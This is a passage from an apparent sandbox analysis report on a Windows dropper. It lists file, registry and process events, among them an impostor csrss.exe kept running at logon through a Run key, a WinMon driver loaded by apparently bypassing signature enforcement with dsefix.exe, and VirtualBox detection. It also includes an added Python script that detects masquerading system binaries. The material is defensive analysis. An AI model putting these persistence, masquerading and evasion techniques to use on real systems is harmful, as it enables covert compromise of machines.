Despite the signature name, the indicator is not a DLL: \??\VBoxMiniRdrDN is the device name exposed by the VirtualBox shared-folders driver, which exists only when the Guest Additions are installed, so a successful open tells the sample it is running inside VirtualBox.

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-5Q2U2.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259443562 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-3NF46.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-7MSSK.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
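
Everything under Adds Run key, Drops file in Drivers directory, Manipulates WinMon/WinMonFS driver and Drops file in Windows directory has the same actor: a binary named csrss.exe that lives in C:\Windows\rss rather than C:\Windows\System32, started at logon through the CrimsonSnow Run value, and it is also the process that writes Winmon.sys into the drivers directory. The Executes dropped EXE list additionally shows C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe and patch.exe being run, dsefix.exe being a name shared with a publicly available utility for switching off Driver Signature Enforcement, which would fit the unsigned driver load (Suspicious behavior: LoadsDriver) and the bcdedit and PatchGuard signatures; the report does not confirm that identification. The block below is an added example, not code from the report or from any of the families it names: it reads the Run-key and file-event rows above (the report escapes registry string data with backslashes, which the parser undoes) and flags any image whose file name is a protected Windows binary but whose directory is not that binary's home. LEGIT_HOMES is an assumption to extend for the hosts being checked; the control rows (the makecab.exe CBS log write and the VBox device open) are also copied from the tables above.

```python
"""Spot system-binary impostors in sandbox registry and file events.

Added example, not part of the sandbox report: the Run-key value and the file
events above all revolve around C:\\Windows\\rss\\csrss.exe, a binary named after
the Client/Server Runtime but living outside System32.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "source label image")

# Assumption: the legitimate on-disk home(s) of each protected binary name.
# Any file with one of these names elsewhere is treated as an impostor.
LEGIT_HOMES = {
    "csrss.exe": (r"c:\windows\system32",),
    "smss.exe": (r"c:\windows\system32",),
    "wininit.exe": (r"c:\windows\system32",),
    "winlogon.exe": (r"c:\windows\system32",),
    "lsass.exe": (r"c:\windows\system32",),
    "services.exe": (r"c:\windows\system32",),
    "svchost.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
    "explorer.exe": (r"c:\windows",),
}

# A Run / RunOnce value write in the report's row format (HKCU or HKLM, Wow6432Node or not).
RUN_ROW = re.compile(
    r'^Set value \(str\) \\REGISTRY\\(?:USER\\[^\\]+|MACHINE)'
    r'\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\(?P<key>RunOnce|Run)\\'
    r'(?P<name>[^\\]+?) = "(?P<data>(?:[^"\\]|\\.)*)" (?P<writer>.+?) N/A$',
    re.IGNORECASE,
)
# A file event: action, target object, then the acting process (always a drive-letter path).
FILE_ROW = re.compile(
    r'^(?P<action>File created|File opened for modification|File opened \(read-only\)) '
    r'(?P<target>.+?) (?P<proc>[A-Za-z]:\\.+?) N/A$'
)

# Rows copied from the tables above: the Run value, three csrss.exe events and two controls.
REPORT_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrimsonSnow = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A',
    r'File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A',
    r'File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'File created C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab C:\Windows\system32\makecab.exe N/A',
    r'File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
]


def unescape(data):
    """Undo the report's backslash escaping of registry string data."""
    return re.sub(r"\\(.)", r"\1", data)


def image_from_command(cmd):
    """First token of a command line, honouring a quoted image path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def is_impostor(path):
    """True if the file name is a protected system binary but the directory is not its home."""
    p = path.strip().lower().rstrip("\\")
    directory, _, name = p.rpartition("\\")
    homes = LEGIT_HOMES.get(name)
    return homes is not None and directory not in homes


def audit_rows(rows):
    """Return a Finding for every Run target, file target or acting process that masquerades."""
    findings = []
    for row in rows:
        row = row.strip()
        m = RUN_ROW.match(row)
        if m:
            image = image_from_command(unescape(m["data"]))
            if is_impostor(image):
                findings.append(Finding("run-key:" + m["key"], m["name"], image))
            continue
        m = FILE_ROW.match(row)
        if m:
            if is_impostor(m["target"]):
                findings.append(Finding("file-target", m["action"], m["target"]))
            if is_impostor(m["proc"]):
                findings.append(Finding("process", m["action"], m["proc"]))
    return findings


if __name__ == "__main__":
    for finding in audit_rows(REPORT_ROWS):
        print(finding)
```

The same name check applies to live hosts: enumerate the Run and RunOnce values and the process list, and anything called csrss.exe, svchost.exe or lsass.exe outside its home directory deserves a look before any signature does.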

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
All three rows are reads of the helper registration key by netsh.exe itself, the same binary flagged under Modifies Windows Firewall, and netsh enumerates that key every time it starts in order to load its helper DLLs. Registering a malicious helper would show up as a Set value row under \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh, and no such write is recorded, so this hit reflects the netsh invocation rather than evidence of helper-DLL persistence.

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\YFBh.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
